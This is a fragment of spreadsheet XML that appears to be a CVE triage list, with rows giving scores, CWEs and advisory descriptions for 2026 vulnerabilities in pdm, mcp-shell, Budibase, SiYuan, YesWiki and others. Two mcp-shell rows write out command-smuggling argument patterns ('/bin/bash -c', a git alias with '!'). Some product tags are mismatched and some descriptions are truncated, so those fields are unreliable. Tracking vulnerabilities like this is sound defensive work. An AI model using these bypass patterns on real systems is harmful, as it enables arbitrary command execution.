      <c r="J534" s="5" t="inlineStr"/>
      <c r="K534" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L534" s="5" t="inlineStr">
        <is>
          <t>pdm is a Python package and dependency manager supporting the latest PEP standards. Versions prior to 2.27.0 are vulnerable to path traversal through write_to_fs. InstallDestination.write_to_fs() in src/pdm/installers/installers.py overrides the base class to add symlink/hardlink support but replaces the safe _path_with_destdir() (which validates via Path.resolve() + is_relative_to()) with a bare os.path.join() that performs no path validation. A malicious wheel with traversal entries can write arbitrary files. This issue has been fixed in version 2.27.0.</t>
        </is>
      </c>
      <c r="M534" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47764</t>
        </is>
      </c>
    </row>
    <row r="535">
      <c r="A535" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B535" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47781</t>
        </is>
      </c>
      <c r="C535" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D535" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E535" s="5" t="inlineStr"/>
      <c r="F535" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G535" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H535" s="5" t="inlineStr"/>
      <c r="I535" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J535" s="5" t="inlineStr"/>
      <c r="K535" s="5" t="inlineStr">
        <is>
          <t>CWE-829, CWE-94</t>
        </is>
      </c>
      <c r="L535" s="5" t="inlineStr">
        <is>
          <t>PDM is a Python package and dependency manager. In versions up to and including 2.26.9, PDM automatically loads project-local plugins from a .pdm-plugins directory during initialization, allowing an attacker-controlled file in an untrusted repository checkout to execute arbitrary Python code before any command is parsed. This happens because load_plugins() runs during Core.init() and adds .pdm-plugins via site.addsitedir(), which processes .pth files and immediately executes any line beginning with import, so the code runs with the privileges of the user invoking pdm and even a benign command such as pdm --version triggers it (making the impact strongest in CI, automation, and privileged contexts). The issue is fixed in version 2.27.0.</t>
        </is>
      </c>
      <c r="M535" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47781</t>
        </is>
      </c>
    </row>
    <row r="536">
      <c r="A536" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B536" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52491</t>
        </is>
      </c>
      <c r="C536" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D536" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E536" s="5" t="inlineStr"/>
      <c r="F536" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G536" s="5" t="inlineStr">
        <is>
          <t>db2</t>
        </is>
      </c>
      <c r="H536" s="5" t="inlineStr"/>
      <c r="I536" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J536" s="5" t="inlineStr"/>
      <c r="K536" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L536" s="5" t="inlineStr">
        <is>
          <t>An issue in libtiff 85f2ac8e0b01cb7db2bbecf4a3b891bdbef67938 allows an attacker to execute arbitrary code via the libtiff/tools/thumbnail.c: main() component</t>
        </is>
      </c>
      <c r="M536" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52491</t>
        </is>
      </c>
    </row>
    <row r="537">
      <c r="A537" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B537" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53091</t>
        </is>
      </c>
      <c r="C537" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D537" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E537" s="5" t="inlineStr"/>
      <c r="F537" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G537" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H537" s="5" t="inlineStr">
        <is>
          <t>linux:linux_kernel</t>
        </is>
      </c>
      <c r="I537" s="5" t="inlineStr">
        <is>
          <t>2026-06-24</t>
        </is>
      </c>
      <c r="J537" s="5" t="inlineStr"/>
      <c r="K537" s="5" t="inlineStr">
        <is>
          <t>CWE-131</t>
        </is>
      </c>
      <c r="L537" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: pull headers in qdisc_pkt_len_segs_init()
Most ndo_start_xmit() methods expects headers of gso packets
to be already in skb-&gt;head.
net/core/tso.c users are particularly at risk, because tso_build_hdr()
does a memcpy(hdr, skb-&gt;data, hdr_len);
qdisc_pkt_len_segs_init() already does a dissection of gso packets.
Use pskb_may_pull() instead of skb_header_pointer() to make
sure drivers do not have to reimplement this.
Some malicious packets could be fed, detect them so that we can
drop them sooner with a new SKB_DROP_REASON_SKB_BAD_GSO drop_reason.</t>
        </is>
      </c>
      <c r="M537" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53091</t>
        </is>
      </c>
    </row>
    <row r="538">
      <c r="A538" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B538" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55581</t>
        </is>
      </c>
      <c r="C538" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D538" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E538" s="5" t="inlineStr"/>
      <c r="F538" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G538" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H538" s="5" t="inlineStr"/>
      <c r="I538" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J538" s="5" t="inlineStr"/>
      <c r="K538" s="5" t="inlineStr">
        <is>
          <t>CWE-1188, CWE-183, CWE-78</t>
        </is>
      </c>
      <c r="L538" s="5" t="inlineStr">
        <is>
          <t>mcp-shell is an MCP server for running shell commands securely, auditably, and on demand. Prior to 0.6.0, the default Docker security.yaml includes /bin/bash in allowed_executables, while security.go validates only the first token and checkBlockedPatternsAndCommands does not reject the shell command-mode flag -c. A caller of the shell_exec MCP tool can provide the command argument `/bin/bash -c &lt;arbitrary-command&gt;`, which passes validation and reaches executor.go, where parseCommand and exec.CommandContext execute the arbitrary command as mcpuser outside the intended allowlist. This issue is fixed in version 0.6.0.</t>
        </is>
      </c>
      <c r="M538" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55581</t>
        </is>
      </c>
    </row>
    <row r="539">
      <c r="A539" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B539" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55582</t>
        </is>
      </c>
      <c r="C539" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D539" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E539" s="5" t="inlineStr"/>
      <c r="F539" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G539" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H539" s="5" t="inlineStr"/>
      <c r="I539" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J539" s="5" t="inlineStr"/>
      <c r="K539" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L539" s="5" t="inlineStr">
        <is>
          <t>mcp-shell is an MCP server for running shell commands securely, auditably, and on demand. Prior to 0.6.0, the default security.yaml allows /usr/bin/git, while security.go omits ! from containsShellMetacharacters and containsDangerousShellConstructs and applies no per-executable argument policy. A caller of the shell_exec MCP tool can provide the command argument /usr/bin/git -c alias.pwn=!&lt;arbitrary-command&gt;, causing Git to create a shell alias and execute arbitrary OS commands as the mcp-shell process user. The default Docker image runs as mcpuser with Git installed and secure mode enabled, so the bypass is exploitable in the default deployment without additional authentication beyond MCP connectivity. This issue is fixed in version 0.6.0.</t>
        </is>
      </c>
      <c r="M539" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55582</t>
        </is>
      </c>
    </row>
    <row r="540">
      <c r="A540" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B540" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-64657</t>
        </is>
      </c>
      <c r="C540" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D540" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E540" s="5" t="inlineStr"/>
      <c r="F540" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G540" s="5" t="inlineStr">
        <is>
          <t>postgresql</t>
        </is>
      </c>
      <c r="H540" s="5" t="inlineStr"/>
      <c r="I540" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J540" s="5" t="inlineStr"/>
      <c r="K540" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L540" s="5" t="inlineStr">
        <is>
          <t>Budibase is an open-source low-code platform. Prior to 3.39.19, the PostgreSQL datasource connector in packages/server/src/integrations/postgres.ts interpolates the user-controlled schema configuration field into a SET search_path statement without escaping embedded double quotes, allowing an authenticated administrator who saves or tests the datasource to execute arbitrary SQL through the simple query protocol. This issue is fixed in version 3.39.19.</t>
        </is>
      </c>
      <c r="M540" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-64657</t>
        </is>
      </c>
    </row>
    <row r="541">
      <c r="A541" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B541" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67986</t>
        </is>
      </c>
      <c r="C541" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D541" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E541" s="5" t="inlineStr"/>
      <c r="F541" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G541" s="5" t="inlineStr">
        <is>
          <t>f5</t>
        </is>
      </c>
      <c r="H541" s="5" t="inlineStr"/>
      <c r="I541" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J541" s="5" t="inlineStr"/>
      <c r="K541" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L541" s="5" t="inlineStr">
        <is>
          <t>amazing-print/amazing_print at commit dc890dfafdf07088ea901df53c19c2710e5c5234 contains a Ruby code injection condition in AwesomeMethodArray#grep. A specially named method containing Ruby interpolation syntax can be interpolated into a dynamically constructed eval string when grep is called with a block, resulting in Ruby code execution in the host process. Exploitation requires an application path that allows an attacker to influence dynamic method names.</t>
        </is>
      </c>
      <c r="M541" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67986</t>
        </is>
      </c>
    </row>
    <row r="542">
      <c r="A542" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B542" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69479</t>
        </is>
      </c>
      <c r="C542" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D542" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E542" s="5" t="inlineStr"/>
      <c r="F542" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G542" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H542" s="5" t="inlineStr"/>
      <c r="I542" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J542" s="5" t="inlineStr"/>
      <c r="K542" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L542" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="M542" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69479</t>
        </is>
      </c>
    </row>
    <row r="543">
      <c r="A543" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B543" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69638</t>
        </is>
      </c>
      <c r="C543" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D543" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E543" s="5" t="inlineStr"/>
      <c r="F543" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G543" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H543" s="5" t="inlineStr"/>
      <c r="I543" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J543" s="5" t="inlineStr"/>
      <c r="K543" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L543" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="M543" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69638</t>
        </is>
      </c>
    </row>
    <row r="544">
      <c r="A544" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B544" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77827</t>
        </is>
      </c>
      <c r="C544" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D544" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E544" s="5" t="inlineStr"/>
      <c r="F544" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G544" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H544" s="5" t="inlineStr"/>
      <c r="I544" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J544" s="5" t="inlineStr"/>
      <c r="K544" s="5" t="inlineStr">
        <is>
          <t>CWE-428</t>
        </is>
      </c>
      <c r="L544" s="5" t="inlineStr">
        <is>
          <t>Maono Link 3.8.13 MaonoAiServices Windows service allows local privilege escalation for a standard user account via improper write privileges in 'C:\ProgramData\Maono'. Fixed in 4.0.80.</t>
        </is>
      </c>
      <c r="M544" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77827</t>
        </is>
      </c>
    </row>
    <row r="545">
      <c r="A545" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B545" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87811</t>
        </is>
      </c>
      <c r="C545" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D545" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E545" s="5" t="inlineStr"/>
      <c r="F545" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G545" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H545" s="5" t="inlineStr"/>
      <c r="I545" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J545" s="5" t="inlineStr"/>
      <c r="K545" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L545" s="5" t="inlineStr">
        <is>
          <t>SiYuan before v3.8.2 inserts persisted notebook template paths into HTML input value attributes without proper attribute encoding. Attackers can craft malicious template paths that break out of the attribute context and execute JavaScript when a victim opens notebook configuration, enabling same-origin API requests and application state manipulation.</t>
        </is>
      </c>
      <c r="M545" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87811</t>
        </is>
      </c>
    </row>
    <row r="546">
      <c r="A546" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B546" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87813</t>
        </is>
      </c>
      <c r="C546" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D546" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E546" s="5" t="inlineStr"/>
      <c r="F546" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G546" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H546" s="5" t="inlineStr"/>
      <c r="I546" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J546" s="5" t="inlineStr"/>
      <c r="K546" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L546" s="5" t="inlineStr">
        <is>
          <t>SiYuan before v3.8.2 contains a stored cross-site scripting vulnerability in the Search Assets result list where asset filenames are interpolated into HTML without escaping. Authenticated attackers can craft asset filenames containing malicious markup that executes JavaScript in the victim's browser when searching assets, enabling same-origin API requests and application state manipulation.</t>
        </is>
      </c>
      <c r="M546" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87813</t>
        </is>
      </c>
    </row>
    <row r="547">
      <c r="A547" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B547" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87814</t>
        </is>
      </c>
      <c r="C547" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D547" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E547" s="5" t="inlineStr"/>
      <c r="F547" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G547" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H547" s="5" t="inlineStr"/>
      <c r="I547" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J547" s="5" t="inlineStr"/>
      <c r="K547" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L547" s="5" t="inlineStr">
        <is>
          <t>SiYuan before v3.8.2 contains a stored cross-site scripting vulnerability in the search asset preview feature that fails to escape indexed asset content before inserting it into the DOM using innerHTML. Attackers who can place crafted text assets in a workspace can execute JavaScript in the SiYuan origin when victims preview the assets, enabling authenticated API requests and workspace manipulation.</t>
        </is>
      </c>
      <c r="M547" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87814</t>
        </is>
      </c>
    </row>
    <row r="548">
      <c r="A548" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B548" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88022</t>
        </is>
      </c>
      <c r="C548" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D548" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E548" s="5" t="inlineStr"/>
      <c r="F548" s="5" t="inlineStr"/>
      <c r="G548" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="H548" s="5" t="inlineStr"/>
      <c r="I548" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J548" s="5" t="inlineStr"/>
      <c r="K548" s="5" t="inlineStr">
        <is>
          <t>CWE-943</t>
        </is>
      </c>
      <c r="L548" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements in data query logic in the MongoDB integration for Laravel can cause an array supplied to an explicit equality filter to be interpreted as a query condition rather than as a literal value. This affects the three-argument `where` method when the operator is `=` or `eq`, as well as the `find` and `delete` methods that use that code path. An attacker who can cause an affected application to supply an operator-shaped array to one of these APIs may obtain a document other than the intended target or delete documents beyond the intended target.</t>
        </is>
      </c>
      <c r="M548" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88022</t>
        </is>
      </c>
    </row>
    <row r="549">
      <c r="A549" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B549" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88890</t>
        </is>
      </c>
      <c r="C549" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D549" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E549" s="5" t="inlineStr"/>
      <c r="F549" s="5" t="inlineStr"/>
      <c r="G549" s="5" t="inlineStr">
        <is>
          <t>oracle</t>
        </is>
      </c>
      <c r="H549" s="5" t="inlineStr"/>
      <c r="I549" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J549" s="5" t="inlineStr"/>
      <c r="K549" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L549" s="5" t="inlineStr">
        <is>
          <t>OpenPanel through commit cd24bb8 contains an SQL injection vulnerability in the analytics filter builder that fails to validate profile.* filter column identifiers before interpolating them into ClickHouse WHERE clauses. An authenticated attacker with project-scoped read or root export credentials can inject arbitrary ClickHouse SQL to bypass project isolation and read other organizations' analytics data and profile PII via blind boolean oracle techniques.</t>
        </is>
      </c>
      <c r="M549" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88890</t>
        </is>
      </c>
    </row>
    <row r="550">
      <c r="A550" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B550" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52769</t>
        </is>
      </c>
      <c r="C550" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D550" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E550" s="5" t="inlineStr"/>
      <c r="F550" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G550" s="5" t="inlineStr">
        <is>
          <t>oracle</t>
        </is>
      </c>
      <c r="H550" s="5" t="inlineStr"/>
      <c r="I550" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J550" s="5" t="inlineStr"/>
      <c r="K550" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L550" s="5" t="inlineStr">
        <is>
          <t>YesWiki is a wiki system written in PHP. From version 4.6.2 to before version 4.6.6, the POST /api/forms/{formId}/actor/inbox route - exposed publicly with acl:"public" - accepts an HTTP Signature header whose keyId parameter is a URL. HttpSignatureService::verifySignature() parses the header and immediately makes a server-side HTTP GET to that URL, before any cryptographic verification or URL validation. An unauthenticated remote attacker can therefore make YesWiki issue arbitrary outbound HTTP requests to any host the server can reach - internal services, cloud-metadata endpoints (169.254.169.254), intranet-only admin panels, etc. - and read enough back via timing and error-message oracles to scan ports, enumerate services, and (on a real cloud instance) reach IAM metadata. The only deployment-side precondition is that ActivityPub be enabled on at least one Bazar form. This issue has been patched in version 4.6.6.</t>
        </is>
      </c>
      <c r="M550" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52769</t>
        </is>
      </c>
    </row>
    <row r="551">
      <c r="A551" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B551" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54100</t>
        </is>
      </c>
      <c r="C551" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D551" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E551" s="5" t="inlineStr"/>
      <c r="F551" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G551" s="5" t="inlineStr">
        <is>
          <t>windows, red hat</t>
        </is>
      </c>
      <c r="H551" s="5" t="inlineStr">
        <is>
          <t>redhat:openshift_container_platform, redhat:windows_machine_config_operator</t>
        </is>
      </c>
      <c r="I551" s="5" t="inlineStr">
        <is>
          <t>2026-06-22</t>
        </is>
      </c>
      <c r="J551" s="5" t="inlineStr"/>
      <c r="K551" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="L551" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the Windows Machine Config Operator (WMCO) for Red Hat OpenShift Container Platform. WMCO establishes SSH connections to Windows worker nodes without verifying the remote server host key. An adjacent-network attacker who can intercept or redirect WMCO's SSH session can capture WICD and kubelet bootstrap credentials transferred during node configuration, enabling compromise of Windows node identities in the cluster.</t>
        </is>
      </c>
      <c r="M551" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54100</t>
        </is>
      </c>
    </row>
    <row r="552">
      <c r="A552" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B552" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77104</t>
        </is>
      </c>
      <c r="C552" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D552" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E552" s="5" t="inlineStr"/>
      <c r="F552" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G552" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H552" s="5" t="inlineStr">
        <is>
          <t>commvault:commvault, linux:linux_kernel, microsoft:windows</t>
        </is>
      </c>
      <c r="I552" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J552" s="5" t="inlineStr"/>
      <c r="K552" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L552" s="5" t="inlineStr">
        <is>
          <t>CommServe contained a path traversal issue affecting information disclosure. Software customers upgrade to resolved maintenance release. Update CommServe.</t>
        </is>
      </c>
      <c r="M552" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77104</t>
        </is>
      </c>
    </row>
    <row r="553">
      <c r="A553" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B553" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87524</t>
        </is>
      </c>
      <c r="C553" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D553" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E553" s="5" t="inlineStr"/>
      <c r="F553" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G553" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H553" s="5" t="inlineStr">
        <is>
          <t>google:chrome, microsoft:windows</t>
        </is>
      </c>
      <c r="I553" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J553" s="5" t="inlineStr"/>
      <c r="K553" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L553" s="5" t="inlineStr">
        <is>
          <t>Use after free in Core in Google Chrome on on Windows prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="M553" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87524</t>
        </is>
      </c>
    </row>
    <row r="554">
      <c r="A554" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B554" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87616</t>
        </is>
      </c>
      <c r="C554" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D554" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E554" s="5" t="inlineStr"/>
      <c r="F554" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G554" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H554" s="5" t="inlineStr">
        <is>
          <t>google:chrome, microsoft:windows</t>
        </is>
      </c>
      <c r="I554" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J554" s="5" t="inlineStr"/>
      <c r="K554" s="5" t="inlineStr">
        <is>
          <t>CWE-665</t>
        </is>
      </c>
      <c r="L554" s="5" t="inlineStr">
        <is>
          <t>Improper initialization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M554" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87616</t>
        </is>
      </c>
    </row>
    <row r="555">
      <c r="A555" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B555" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87618</t>
        </is>
      </c>
      <c r="C555" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D555" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E555" s="5" t="inlineStr"/>
      <c r="F555" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G555" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H555" s="5" t="inlineStr">
        <is>
          <t>google:chrome, microsoft:windows</t>
        </is>
      </c>
      <c r="I555" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
